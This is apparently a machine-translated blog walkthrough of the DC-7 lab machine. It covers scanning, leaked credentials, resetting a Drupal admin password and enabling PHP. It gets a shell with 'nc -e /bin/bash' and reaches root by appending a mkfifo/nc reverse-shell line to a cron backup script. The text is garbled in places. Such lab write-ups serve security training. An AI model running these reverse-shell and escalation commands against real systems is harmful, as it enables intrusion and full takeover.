当前位置:网站首页>Dc-7 target
Dc-7 target
2022-07-07 06:06:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
ifconfig
Find the host IP
Sweep a wave Intranet , Detect the surviving host
nmap 192.168.61.0/24
Use nmap Tool pair DC-5 The target machine scans the open port
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
Yes 22 and 80 port
Here's a hint DC7USER
use Baidu Search
You can download a file
This also shows that it is important
Download to kali Local
git clone https://github.com/Dc7User/staffdb
cd staffdb
ls
cat config.php
Use SSH Link target , Sign in dc7user It is found that you can successfully connect
ls
find out backups mbox
backups Next :website.sql.gpg website.tar.gz.gpg
Found two files , But it's all about gpg At the end of the ,gpg The command is used to encrypt files , The encrypted files are all garbled
mbox It's a document
The source code of backup execution is found in /opt/scripts Under the table of contents
Get into /opt/scripts Under the table of contents
cd /opt/scripts
see file
cat backups.sh
Found two commands gpg drush
gpg The command is used to encrypt ,drush The order is drupal Commands used in the framework to do some configuration , It can change the user name and password
Enter into /var/www/html Under the table of contents , Because the website will have a admin user , So use drush Command to change admin The user's password is 123456, It is found that it can be modified successfully
cd /var/www/html/
drush user-password admin --password="123456"
admin Your password has been changed to 123456
use dirb Command to scan out the page
dirb http://192.168.61.136
stay Content—>Add content-->Basic page Next , Ready to add PHP Code bounce shell, But found that it does not support PHP
After Baidu knows ,php To be imported as a separate module
PHP Module download address :
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
Check , Then click the bottom install
And then it's all right
Go back to the page at that time , You can use PHP 了
You can connect successfully with ant sword
And then use kali monitor
nc -lvvp 4444
nc -e /bin/bash 192.168.61.129 4444
python -c 'import pty;pty.spawn("/bin/bash")'
Successful connection
find / -name backups.sh 2>/dev/null
then
cd /opt/scripts
ls -l
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh
nc -lvvp 7777
Got it root jurisdiction
cd /root
ls
cat theflag.txt
边栏推荐
- 每秒10W次分词搜索,产品经理又提了一个需求!!!(收藏)
- What is make makefile cmake qmake and what is the difference?
- Introduction to the extension implementation of SAP Spartacus checkout process
- zabbix_ Get test database failed
- MFC BMP sets the resolution of bitmap, DPI is 600 points, and gdiplus generates labels
- 力扣102题:二叉树的层序遍历
- Industrial Finance 3.0: financial technology of "dredging blood vessels"
- Three level menu data implementation, nested three-level menu data
- EMMC打印cqhci: timeout for tag 10提示分析与解决
- Randomly generate session_ id
猜你喜欢
【FPGA教程案例14】基于vivado核的FIR滤波器设计与实现
Reptile exercises (III)
Financial risk control practice - decision tree rule mining template
SubGHz, LoRaWAN, NB-IoT, 物联网
jvm命令之 jcmd:多功能命令行
SAP ABAP BDC (batch data communication) -018
Loss function and positive and negative sample allocation in target detection: retinanet and focal loss
VScode进行代码补全
Jstat pour la commande JVM: voir les statistiques JVM
Chain storage of stack
随机推荐
linear regression
Determine whether the file is a DICOM file
[daily training -- Tencent selected 50] 292 Nim games
每秒10W次分词搜索,产品经理又提了一个需求!!!(收藏)
Chain storage of stack
《ClickHouse原理解析与应用实践》读书笔记(6)
Senior programmers must know and master. This article explains in detail the principle of MySQL master-slave synchronization, and recommends collecting
Pytorch builds neural network to predict temperature
jvm命令之 jcmd:多功能命令行
Why does the data center need a set of infrastructure visual management system
Flask1.1.4 werkzeug1.0.1 source code analysis: start the process
On the discrimination of "fake death" state of STC single chip microcomputer
[shell] clean up nohup Out file
PTA 天梯赛练习题集 L2-003 月饼 测试点2,测试点3分析
【已解决】记一次EasyExcel的报错【读取xls文件时全表读不报错,指定sheet名读取报错】
Forkjoin is the most comprehensive and detailed explanation (from principle design to use diagram)
线性回归
Value range of various datetimes in SQL Server 2008
Flinksql read / write PgSQL
What EDA companies are there in China?